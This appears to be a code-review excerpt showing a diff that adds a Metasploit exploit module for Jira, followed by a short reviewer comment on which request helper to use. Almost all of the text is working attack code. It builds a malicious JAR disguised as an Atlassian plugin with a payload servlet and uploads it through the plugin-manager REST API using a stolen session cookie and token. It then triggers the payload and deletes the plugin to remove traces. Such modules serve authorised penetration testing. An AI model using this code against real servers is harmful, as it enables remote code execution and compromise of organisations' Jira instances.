modules/exploits/multi/http/jira_plugin_upload.rb

```diff
@@ -0,0 +1,236 @@
+        <description></description>
+        <version>1.0</version>
+        <vendor name="" url="" />
+
+        <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
+        <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
+
+    </plugin-info>
+
+    <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
+        <description>"#{name}"</description>
+        <url-pattern>/metasploit/PayloadServlet</url-pattern>
+    </servlet>
+
+    </atlassian-plugin>
+    }
+
+    # Generates .jar file for upload
+    zip = payload.encoded_jar
+    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+    zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+    contents = zip.pack
+
+    boundary = rand_text_numeric(27)
+
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
+    data << contents
+    data << "\r\n--#{boundary}--"
+
+    print_status("Attempting to upload #{name}")
+    res = send_request_cgi({
+      'uri'            => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
+      'vars_get'       =>
+        {
+          'token'      => "#{upm_token}"
+        },
+      'method'         => 'POST',
+      'data'           => data,
+      'headers'        =>
+        {
+          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
+          'Cookie'       => good_cookie.to_s
+        }
+    }, 25)
+
+    unless res && res.code == 202
+      print_status("Error uploading #{name}")
+      print_status("HTTP Response Code: #{res.code}")
+      print_status("Server Response: #{res.body}")
+      return
+    end
+
+    print_status("Successfully uploaded #{name}")
+    print_status("Executing #{name}")
+    Rex::ThreadSafe.sleep(3)
+    send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
+      'method'       => 'GET',
+      'cookie'       => good_cookie.to_s
+    })
+
+    print_status("Deleting #{name}")
+    send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
+      'method'       => 'DELETE',
+      'cookie'       => good_cookie.to_s
+    })
+  end
+
+  def access_login?
+    res = query_login
+    if res.nil?
+      fail_with(Failure::Unknown, 'Unable to access the web application!')
+    end
+    return false unless res && res.code == 200
+    @session_id = get_sid(res)
+    @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+    return true
+  end
+
+  # Sends GET request to login page so the HTTP response can be used
+  def query_login
+    path = normalize_uri(target_uri.path.to_s, 'login.jsp')
+    res = send_request_raw('uri' => path)
```

Comment:
Is there a reason this is `send_request_raw` and not `send_reqeust_cgi`? The latter is preferred.